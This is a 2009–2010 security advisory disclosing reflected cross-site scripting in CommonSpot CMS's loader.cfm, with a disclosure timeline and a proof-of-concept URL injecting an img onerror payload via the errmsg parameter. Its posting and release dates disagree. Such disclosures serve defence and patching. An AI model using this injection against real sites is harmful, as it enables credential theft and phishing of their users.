Commonspot CMS 5.1.0.x Cross Site Scripting vulnerabilities

Commonspot CMS 5.1.0.x Cross Site Scripting vulnerabilities

Posted on Oct 13 2009   |  Plain text version

Summary

XSS vulnerabilities in Commonspot CMS

Description

XSS vulnerabilities in CommonSpot <=CMS 5.1.0.x ======================================================== Vendor: Paperthin Software: Commonspot CMS < 5.1 Vulnerable versions: Tested on 5.1.0.128, 5.0.3.132, 5.0.2.56 but all versions between 5.0.x and 5.1 seem vulnerable Release Date: 2010-05-31 Last Update: 2010-05-31 Critical: Moderate Impact: Credential theft Cross Site Request Forgery Phishing attacks Solution Status: Not fixed SOFTWARE DESCRIPTION ____________________ *CommonSpot by PaperThin is a flexible, scalable and easy to use content management system (CMS). CommonSpot’s inherent ease of use empowers business users to be self-sufficient, productive, and achieve faster time-to-market, while enabling IT and site administrators to easily adapt the system to meet their complex needs. Key features such as the ability to create and publish RSS feeds—without writing code—come right out of the box. CommonSpot also offers a rich metadata architecture for content tagging and re-use, and taxonomy and facet-based navigation for better content organization. (*) Taken from website VULNERABILITY DESCRIPTION _________________________ Fields in loader.cfm are not sanitized properly making the CMS vulnerable to different Cross Site Scripting vulnerabilities. DISCLOSURE TIMELINE _________________________ 09/13/2009 - Vendor contacted 05/31/2010 - Full disclosure EXPLOIT/POC _________________ loader.cfm?csModule=security/email-login-info&errmsg=

POC

/loader.cfm?csModule=security/email-login-info&errmsg=%3Cimg%20src=%27x%27%20onerror=%22alert(0);%22%3E&bNewWindow=0


Latest Blog Entries

Downloading an Application's Entire Source Code Through an Exposed GIT Directory
Website administrators sometimes inadvertently leave an exposed .git directory, from which it is possible to download the entire source code of the web application using just wget and a common server misconfiguration.

credmap: The Credential Mapper
An overview of credmap, an open source penetration testing tool that automates the process of testing for credential reuse. It does so by testing supplied user credentials on known websites and verifies if the password has been reused on any of these.

New publication: Mastering the Nmap Scripting Engine
We invite you to learn more about the latest publication from our team, "Mastering the Nmap Scripting Engine".

Latest News

Blackhat EU 2015
Websec participated with two tools at the Blackhat, EU Arsenal held in Amsterdam, NL from the 10-13 of November, 2015. During this event, we introduced our brand new tool "credmap: The Credential Mapper" and also presented an amped-up version of Panoptic.

BSides Vancouver 2015
Websec is proud to announce that we will be attending the 3rd annual edition of BSides Vancouver, a local non-profit information security conference held in the heart of Vancouver, BC on March 16 and 17.